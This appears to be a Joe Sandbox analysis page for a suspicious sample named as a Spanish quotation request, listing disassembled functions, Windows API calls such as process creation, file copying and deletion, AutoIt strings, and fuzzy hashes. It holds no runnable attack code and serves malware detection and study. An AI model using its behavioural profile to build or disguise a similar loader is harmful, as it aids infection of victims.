Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: D%-$D%-$D%-$D%-$D%-D%-$Variable must be of type 'Object'.
API String ID: 0-943184658
Opcode ID: 46dabd32c3bd721e6615b3da0e277658ff9a72b28b929a8cf65916e6dbb07255
Instruction ID: 4a1b9acc830406d9bfe6fa458a07455e17bdca2b4bd54d6569e0e13dbe938ea7
Opcode Fuzzy Hash: 46dabd32c3bd721e6615b3da0e277658ff9a72b28b929a8cf65916e6dbb07255
Instruction Fuzzy Hash: 76C28B71A20205CFCF24CF58D880AADB7B1BF18310F258969E955AB392D371EDA5CF91

Function 0020EC40 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0020FE66

Strings

D%-D%-, xrefs: 0020F05B
D%-, xrefs: 00254972
D%-, xrefs: 0020F36A
D%-, xrefs: 0020EFB7
D%-, xrefs: 0025491E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%-$D%-$D%-$D%-$D%-D%-
API String ID: 1385522511-1705906001
Opcode ID: 74a6bce3992c78b4e8db533c83b0123272fb1d0406bb75cb4b08f69455869c99
Instruction ID: 1a3258a4495df9f26f47a32a37323eac00e60fa3e224841ebf7775de691a989c
Opcode Fuzzy Hash: 74a6bce3992c78b4e8db533c83b0123272fb1d0406bb75cb4b08f69455869c99
Instruction Fuzzy Hash: 13B2BD74A28341CFDB64CF14D580A2AB7E1BF99304F24486EE8858B792D771ECA5CF52

Function 01784C48 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01784C8D

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 48bf5163a1f6b068b3f954ec1966d1a469c31343bd00440bc7f8c78124f4f010
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 1951D975A50209FBEF20EFA4CC49FDEB7B8BF48701F108554F61AEA180DAB496458B64

Function 00202C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00202C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00202CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00201CAD,?), ref: 00202CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00201CAD,?), ref: 00202CCF

Strings

edit, xrefs: 00202CAC
AutoIt v3, xrefs: 00202C89, 00202C8E, 00202C8F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 17e8d93ab04cc1e33a1029a0581574e5578bac405ab7bad86b76d56cbfb10844
Instruction ID: 0d53799a7e6c872a290403ec150b5017696ea61d65ec9b2ddc929fc00183478f
Opcode Fuzzy Hash: 17e8d93ab04cc1e33a1029a0581574e5578bac405ab7bad86b76d56cbfb10844
Instruction Fuzzy Hash: 84F0D475A412907BEB711B27BC0CEB76FBDD7CAF60B10009BF904A29A0C6611C60DAB0

Function 00272947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00272C05
DeleteFileW.KERNEL32(?), ref: 00272C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00272C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00272CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00272CC0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 90a6e31a09b8f07c8c61e55c3ffe490cdb82d0602c9f64cb203a1f3ab2baf44e
Instruction ID: 9279604e775c0b2ad73c751af59c3670c4328e316e2e9fd375a6601fb0a47d16
Opcode Fuzzy Hash: 90a6e31a09b8f07c8c61e55c3ffe490cdb82d0602c9f64cb203a1f3ab2baf44e
Instruction Fuzzy Hash: 02B15F71D20129EBDF15DFA4CC85EDEB7BDEF49350F1080AAF909E6141EA309A588F61

Function 00235AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JO , xrefs: 00235BA8, 00235C6C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: JO
API String ID: 0-3468927494
Opcode ID: a836baac6c82113b87300151c7718744ab72fa63c1ca284c494094a95c5a305f
Instruction ID: d986b6f47e8277fc8cd0f0901c8eda0320889a0c46bcfdc46591ac1c28489d0e
Opcode Fuzzy Hash: a836baac6c82113b87300151c7718744ab72fa63c1ca284c494094a95c5a305f
Instruction Fuzzy Hash: 0851E3F1D3062AEFCB109FA4D945FEEBBB8AF05318F14055AF809A7291D77099218B61

Function 01786708 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 163
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017865F8: Sleep.KERNELBASE(000001F4), ref: 01786609

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0178685D

Strings

O6Z3R20PJDXZE1XSM8K24IYAWY7MB, xrefs: 017868DD, 017868E0

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateFileSleep
String ID: O6Z3R20PJDXZE1XSM8K24IYAWY7MB
API String ID: 2694422964-2209406531
Opcode ID: fbc081471e8370dc7df89a4276237ca8531cbe023434c6eb2849d538e557f993
Instruction ID: edb692d998897a9f7724944ba7c4f3f9f0a0db8da9049b49b5489b060f080e0b
Opcode Fuzzy Hash: fbc081471e8370dc7df89a4276237ca8531cbe023434c6eb2849d538e557f993
Instruction Fuzzy Hash: 8F61A330D48288EAEF11D7B4D858BEEFB75AF25304F044199E6487B2C1C7B90B49CB66

Function 00203B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00203B0F,SwapMouseButtons,00000004,?), ref: 00203B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00203B0F,SwapMouseButtons,00000004,?), ref: 00203B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00203B0F,SwapMouseButtons,00000004,?), ref: 00203B83

Strings

Control Panel\Mouse, xrefs: 00203B3E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e2ecc2379685a33b730daa34e6c857ae43b0ed4ea0d309358c8f4e58b1530a48
Instruction ID: 9e47900dd3e12d35c13c3c61bb340637e7900188cc89ed6880f9a7a637f5e19f
Opcode Fuzzy Hash: e2ecc2379685a33b730daa34e6c857ae43b0ed4ea0d309358c8f4e58b1530a48
Instruction Fuzzy Hash: 17112AB5520209FFDB20CFA5DC89AAEBBBCEF04748B10445AA805D7250D2719E549760

Function 00202DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00242C8C

Part of subcall function 00203AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00203A97,?,?,00202E7F,?,?,?,00000000), ref: 00203AC2

Part of subcall function 00202DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00202DC4

Strings

X, xrefs: 00242C5A
`e,, xrefs: 00242C85

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e,
API String ID: 779396738-2207544159
Opcode ID: 51e431e46424df785fef84a9417dd50615fe4682161503707f1e18b31b916665
Instruction ID: 7d6d8763d6f572351b3f5f984012d0dde620c7e60b3ce5f2bd51e2f132ec22a1
Opcode Fuzzy Hash: 51e431e46424df785fef84a9417dd50615fe4682161503707f1e18b31b916665
Instruction Fuzzy Hash: 6821A871A203589FCB15EF94D849BDE7BFC9F49304F40405AE405B7282DBB459AD8F61

Function 0021FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00220668

Part of subcall function 002232A4: RaiseException.KERNEL32(?,?,?,0022068A,?,002D1444,?,?,?,?,?,?,0022068A,00201129,002C8738,00201129), ref: 00223304

__CxxThrowException@8.LIBVCRUNTIME ref: 00220685

Strings

Unknown exception, xrefs: 00220692

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: be43b4a20bc7d71deeef83ceda721b7d8e90ffda9c8f9c059280a9c56435e5fb
Instruction ID: ef40377ad867358bd675dc8b8535461899ca59a42eb3576e7de9b31567624fc9
Opcode Fuzzy Hash: be43b4a20bc7d71deeef83ceda721b7d8e90ffda9c8f9c059280a9c56435e5fb
Instruction Fuzzy Hash: A4F0C83492021DB7CF00BAE4F886DAE776C5E00310B604575F924D5593EF75DA75C9C0

Function 01785328 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0178536D
ExitProcess.KERNEL32(00000000), ref: 0178538C

Strings

D, xrefs: 01785339

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: eaefe38700dea64172a30051a10e55a487822181055063bbb51e2642d874e9cd
Instruction ID: 125bfce99a801030c368957529f1241dc6bcef0be8740d1aee3f5846af90e6ec
Opcode Fuzzy Hash: eaefe38700dea64172a30051a10e55a487822181055063bbb51e2642d874e9cd
Instruction Fuzzy Hash: 8AF0EC7194024CABDB60EFE0CD49FEEB778BF04701F408508FA0A9A184DB7496088B61

Function 00273017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0027302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00273044

Strings

aut, xrefs: 00273038

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d5e83a5432b845fa45c19cd1d793d71e2b5c02bed78045478155d5a1c8914bb4
Instruction ID: 83c185eb732629372461b675e988c048dcdd6afc5175b45cdddb03e07497cdef
Opcode Fuzzy Hash: d5e83a5432b845fa45c19cd1d793d71e2b5c02bed78045478155d5a1c8914bb4
Instruction Fuzzy Hash: 5FD05E7290032877DA20A7A4AC0EFCB3A6CDB05750F0002A2BA59E2091DAB09984CAE0

Function 00287F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002882F5
TerminateProcess.KERNEL32(00000000), ref: 002882FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002884DD

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: f6d338e893999b58314cfc3ce528ef50f4c5ec481451dcd0ebc58d7e4ffc1828
Instruction ID: f61785a79527a11e45bc08a748d8973dd55b8772c0b52a2672e467104c960beb
Opcode Fuzzy Hash: f6d338e893999b58314cfc3ce528ef50f4c5ec481451dcd0ebc58d7e4ffc1828
Instruction Fuzzy Hash: CD127B75A183419FC714EF28C484B2ABBE1FF84314F54895DE8898B292CB71ED55CF92

Function 002010F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00201BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00201BF4
Part of subcall function 00201BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00201BFC
Part of subcall function 00201BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00201C07
Part of subcall function 00201BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00201C12
Part of subcall function 00201BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00201C1A
Part of subcall function 00201BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00201C22

Part of subcall function 00201B4A: RegisterWindowMessageW.USER32(00000004,?,002012C4), ref: 00201BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0020136A
OleInitialize.OLE32 ref: 00201388
CloseHandle.KERNEL32(00000000,00000000), ref: 002424AB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e6b6a9d50c3b5a2969e40fb3a50358c292d57b1d22507cef39b403762a859757
Instruction ID: 1f584e73b5f84667f27336408e1034a2c7389931cb7c901026690233d259918e
Opcode Fuzzy Hash: e6b6a9d50c3b5a2969e40fb3a50358c292d57b1d22507cef39b403762a859757
Instruction Fuzzy Hash: 0C718EB4E22340AED784DFB9B9496553BE5FB88344394826BD40AC7BA2E7384C74CF51

Function 0026C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00203923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00203A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0026C259
KillTimer.USER32(?,00000001,?,?), ref: 0026C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0026C270

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 70325c1ebe51a5e8e190ea591aac31c96840932b3b614ed07d065fcd07a11782
Instruction ID: 9c52610cd0b83a05dfc5c38d15e4d74d2ca642aed962885cbd3cf6fcb27699af
Opcode Fuzzy Hash: 70325c1ebe51a5e8e190ea591aac31c96840932b3b614ed07d065fcd07a11782
Instruction Fuzzy Hash: 73319570914344AFEB22DF6498A9BE7BBEC9F06304F10049AD9DE97241C7745AD4CB51

Function 002386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,002385CC,?,002C8CC8,0000000C), ref: 00238704
GetLastError.KERNEL32(?,002385CC,?,002C8CC8,0000000C), ref: 0023870E
__dosmaperr.LIBCMT ref: 00238739

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 681662943b094bf9167319b499c87dfbeb5a1db6cc07b9d43b3cb8fc2328f258
Instruction ID: c4f1c1d6bad67e8b6f06377275dc36516d6238d375b8fb2d0fcf3d4d1d51549f
Opcode Fuzzy Hash: 681662943b094bf9167319b499c87dfbeb5a1db6cc07b9d43b3cb8fc2328f258
Instruction Fuzzy Hash: 9C016BB2A353302AD6206734694A77E675D4B82774F38015AF8198F0D2DEA0CC918950

Function 0020DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0020DB7B
DispatchMessageW.USER32(?), ref: 0020DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020DB9F
Sleep.KERNEL32(0000000A), ref: 0020DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00251CC9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 9d7687756aebccb6397eacadfdc1941134475f8f83d702450a9f76ce0f189c87
Instruction ID: 095e2f7b3e94998e781c151c7ed0f04f76db841a9ab2ea11f01897be79fddf8d
Opcode Fuzzy Hash: 9d7687756aebccb6397eacadfdc1941134475f8f83d702450a9f76ce0f189c87
Instruction Fuzzy Hash: 14F054306553419BE730CBA09C49FEA73ACEF44311F504516E609C30C0DB309468DB16

Function 00272FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00272CD4,?,?,?,00000004,00000001), ref: 00272FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00272CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00273006
CloseHandle.KERNEL32(00000000,?,00272CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0027300D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: b4ea6f211c1c841df4e3adb2d53e527fd447b2ecbd180411425d08f10e276b9a
Instruction ID: 627ef84e9b001541460e83a7579cc493b4eef1317db2d42dab25b8b3aaf6cde9
Opcode Fuzzy Hash: b4ea6f211c1c841df4e3adb2d53e527fd447b2ecbd180411425d08f10e276b9a
Instruction Fuzzy Hash: 60E0863228021077D2302755BC0EF8B3A1CDB86B71F204221F71D750D046A1150152AC

Function 00211310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002117F6

Strings

CALL, xrefs: 002117C6

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
